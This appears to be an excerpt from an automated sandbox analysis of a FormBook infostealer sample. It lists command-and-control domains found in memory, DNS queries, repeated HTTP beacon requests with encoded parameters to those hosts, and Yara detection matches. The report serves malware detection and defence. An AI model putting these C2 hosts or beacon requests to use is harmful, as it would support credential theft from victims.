Source: explorer.exe, 00000003.00000002.4452618925.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4452142235.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2004670806.0000000008890000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bootyfashions.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bootyfashions.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bootyfashions.com/jskg/www.topazkibblez.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bootyfashions.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.coryfireshop.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.coryfireshop.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.coryfireshop.com/jskg/www.lacroixundkress.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.coryfireshop.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dog2meeting.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dog2meeting.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dog2meeting.com/jskg/www.erotictoybox.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dog2meeting.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.erotictoybox.com
Source: explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.erotictoybox.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.erotictoybox.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kvrkl.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kvrkl.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kvrkl.com/jskg/www.switchtoambitwithmirtha.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kvrkl.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lacroixundkress.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lacroixundkress.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lacroixundkress.com/jskg/www.saraadamchak.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lacroixundkress.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lactationdrink.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lactationdrink.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lactationdrink.com/jskg/www.wisdomtoothguru.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lactationdrink.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lbarco.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lbarco.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lbarco.com/jskg/www.bootyfashions.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.lbarco.comReferer:
Source: explorer.exe, 00000003.00000002.4456836117.0000000011332000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4450315499.00000000054F2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.litespeedtech.com/error-page
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pnorg.net
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pnorg.net/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pnorg.net/jskg/www.dog2meeting.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pnorg.netReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ppc-listing.info
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ppc-listing.info/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ppc-listing.info/jskg/www.pnorg.net
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ppc-listing.infoReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.revistabrasileiramarketing.info
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.revistabrasileiramarketing.info/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.revistabrasileiramarketing.info/jskg/www.lactationdrink.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.revistabrasileiramarketing.infoReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.saraadamchak.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.saraadamchak.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.saraadamchak.com/jskg/www.kvrkl.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.saraadamchak.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.successwithyolandafgreen.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.successwithyolandafgreen.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.successwithyolandafgreen.com/jskg/www.lbarco.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.successwithyolandafgreen.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.switchtoambitwithmirtha.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.switchtoambitwithmirtha.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.switchtoambitwithmirtha.com/jskg/www.ppc-listing.info
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.switchtoambitwithmirtha.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.topazkibblez.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.topazkibblez.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.topazkibblez.com/jskg/www.coryfireshop.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.topazkibblez.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wisdomtoothguru.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wisdomtoothguru.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wisdomtoothguru.com/jskg/www.successwithyolandafgreen.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.wisdomtoothguru.comReferer:
Source: explorer.exe, 00000003.00000003.3779584594.000000000C547000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2007842523.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094563543.000000000C547000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4455465026.000000000C54A000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000003.00000003.3095015364.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3780015458.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2003510228.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4451321955.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000003.00000002.4453052192.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000003.00000000.2003510228.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4451321955.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000003.00000003.3779212000.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2002563045.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4450259084.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000003.00000003.3094165083.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095171280.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453687156.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000003.00000000.2005157411.0000000009BAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453687156.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094165083.0000000009D42000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000003.00000002.4455231166.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2007842523.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000003.00000002.4453052192.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000003.00000002.4453052192.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon
Source: explorer.exe, 00000003.00000002.4456836117.0000000011332000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4450315499.00000000054F2000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing

Source: unknown

DNS traffic detected: queries for: www.revistabrasileiramarketing.info

Source: C:\Windows\explorer.exe

Code function: 3_2_103F1302 getaddrinfo,setsockopt,recv,

3_2_103F1302

Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1Host: www.saraadamchak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1Host: www.erotictoybox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=D3ZsiJPHujYqAAcPubxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&8pbLu=d8z4X8O0M HTTP/1.1Host: www.saraadamchak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=YCW0/yd7C01aElrhcPhS/kt9m722krufJvCDJvN/MprEBXvxMY86CRBbv2aG0eSAUYQv&8pbLu=d8z4X8O0M HTTP/1.1Host: www.erotictoybox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=VpJkz2P0T+/fMnrM7Dd1ATiiN68XLLnGpPbE/bn1fGrx+Ecv7ydvnShawUNCssxxEBuD&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lactationdrink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=sl42yIbVTE2EkcOIsEKOUlHCBbE7QxdA6NZ7PagwYH4YR2l/R8Pf4e2TsXHmMhsmvqG9&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lbarco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21r0Zq0hTH&8pbLu=d8z4X8O0M HTTP/1.1Host: www.lacroixundkress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4449219136.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2045843901.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2021713062.0000000003E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4449610086.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4449093142.0000000002E20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.1.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.1.exe.407d900.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.1.exe.3fbfe60.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.1.exe.4009280.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2046232928.0000000001270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000003.00000002.4456583793.00000000103B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
Source: 00000004.00000002.4449703704.0000000004C50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
